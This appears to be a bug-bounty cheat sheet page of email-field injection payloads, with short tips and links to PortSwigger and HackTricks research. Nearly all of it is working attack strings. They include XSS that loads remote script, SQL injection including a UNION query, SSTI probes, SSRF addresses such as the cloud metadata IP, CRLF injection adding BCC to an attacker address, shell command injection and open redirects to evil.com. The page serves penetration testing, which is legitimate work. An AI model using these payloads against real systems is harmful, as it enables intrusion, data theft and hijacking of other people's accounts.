Email injections

Emails injection: XSS, SQLi, SSTI, etc.

Create multiple accounts with an alias email@bugcrowdninja.com email+1@bugcrowdninja.com email+2@bugcrowdninja.com

user[email][]=valid@email.com&user[email][]=attacker@email.com

JSON

{"email":"mymail@b.com"}

Try:

{"email":["mymail@b.com", "attacker@x.com"]}
{"email":"mymail@b.com", "email":"attacker@x.com"}
email=attacker@x.com

Punnycode

Check Email Registration

Registration Form

Parser Abuse - Domain confusion

oastify.com!collab\@example.com
collab%psres.net(@example.com

Splitting the email atom: exploiting parsers to bypass access controlsPortSwigger Research

GitHub - PortSwigger/splitting-the-email-atomGitHub

XSS

"><script>alert(1)</script>@test.com
"><svg/onload=alert(3)>@test.com
"><svg/onload=confirm(1337)>"@x.y
"<script src=//xsshere?"@email.com
"><Img/Src/OnError=alert(1)>"@gmail.com
"><Img/Src/OnError=import('//X55.is')>"@gmail.com

"><Svg/OnLoad=alert(1)>"@gmail.com
"><svg/onload=confirm(1)>"@x.y

test+(<script>alert(0)</script>)@example.com
attacker@gmail.com'\"<svg/onload=alert(document.cookie)>

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).

"><img/src/onerror=import('//domain/')>"@yourdomain.com

XSS

SSTI

test+${{7*7}}@example.com

test+(${{7*7}})@example.com

test-(${{7*7}})@example.com

SSRF

test@your-burpcollaborator.net
test@requestbin.net
test@127.0.0.1
test@localhost
test@169.254.169.254

CRLF

CRLF InjectionPassword Reset

Register or reset password

test@example.com%0d%0aBCC:attacker@example.com
test@example.com\r\nBCC:attacker@example.com
test@example.com%0aCC:attacker@example.com
test@example.com\r\nContent-Type:text/html\r\n\r\n<b>Injected</b>

test@example.com%0d%0aInjected-Header: injected
test@example.com%0aInjected-Header: injected

SQL Injection

SQL Injection

test' OR '1'='1@example.com
test" OR "1"="1@example.com
test@example.com'--
test@example.com") OR 1=1--

"1-'or'1'='1"@email.com

john.doe+intigriti' or/**/1/**/=/**/--@example.com

johne.doe+intigriti'/**/or/**/1/**/=/**/1/**/--@example.com

test+intigiriti'/**/union/**/select/**/table_name/**/from/**/information_schema.tables--@test.test

Email Injections - HackTricksbook.hacktricks.xyz

Bypassing Email Filter which leads to SQL InjectionMedium

Command Injection

Command Injection

test@example.com; whoami
test@example.com && id
test@example.com | uname -a
test@example.com`id`

Open Redirection

test@example.com%0d%0aLocation:https://evil.com
test@example.com/?next=https://evil.com

Bypass Access Control

Splitting the email atom: exploiting parsers to bypass access controlsPortSwigger Research

HTML injection - Subscription form

Email HTML injection with a simple tipMedium

Resources

https://github.com/HackTricks-wiki/hacktricks/blob/master/pentesting-web/email-injections.mdgithub.com

The Ultimate Guide to Email Input Field Vulnerability TestingMedium

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.